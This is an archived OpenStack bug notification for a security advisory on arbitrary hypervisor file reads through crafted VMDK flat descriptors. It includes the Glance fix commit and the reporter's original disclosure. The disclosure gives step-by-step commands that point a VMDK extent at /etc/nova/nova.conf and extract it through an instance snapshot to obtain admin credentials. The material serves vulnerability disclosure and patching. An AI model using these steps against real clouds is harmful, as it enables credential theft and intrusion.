yahoo-eng-team team mailing list archive

Thread
Date
[Bug 1996188] Re: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: OpenStack Infra <1996188@xxxxxxxxxxxxxxxxxx>
Date: Tue, 24 Jan 2023 23:00:00 -0000
Reply-to: Bug 1996188 <1996188@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
Reviewed:  https://review.opendev.org/c/openstack/glance/+/871613
Committed: https://opendev.org/openstack/glance/commit/0d6282a01691cecc2798f7858b181c4bb30f850c
Submitter: "Zuul (22348)"
Branch:    master

commit 0d6282a01691cecc2798f7858b181c4bb30f850c
Author: Dan Smith <dansmith@xxxxxxxxxx>
Date:   Mon Dec 19 15:00:35 2022 +0000

    Enforce image safety during image_conversion
    
    This does two things:
    
    1. It makes us check that the QCOW backing_file is unset on those
    types of images. Nova and Cinder do this already to prevent an
    arbitrary (and trivial to accomplish) host file exposure exploit.
    2. It makes us restrict VMDK files to only allowed subtypes. These
    files can name arbitrary files on disk as extents, providing the
    same sort of attack. Default that list to just the types we believe
    are actually useful for openstack, and which are monolithic.
    
    The configuration option to specify allowed subtypes is added in
    glance's config and not in the import options so that we can extend
    this check later to image ingest. The format_inspector can tell us
    what the type and subtype is, and we could reject those images early
    and even in the case where image_conversion is not enabled.
    
    Closes-Bug: #1996188
    Change-Id: Idf561f6306cebf756c787d8eefdc452ce44bd5e0


** Changed in: glance
       Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here is the details :
  By using a VMDK file, you can dump any file on the hypervisor.
  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]

  cinder seems also affected

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions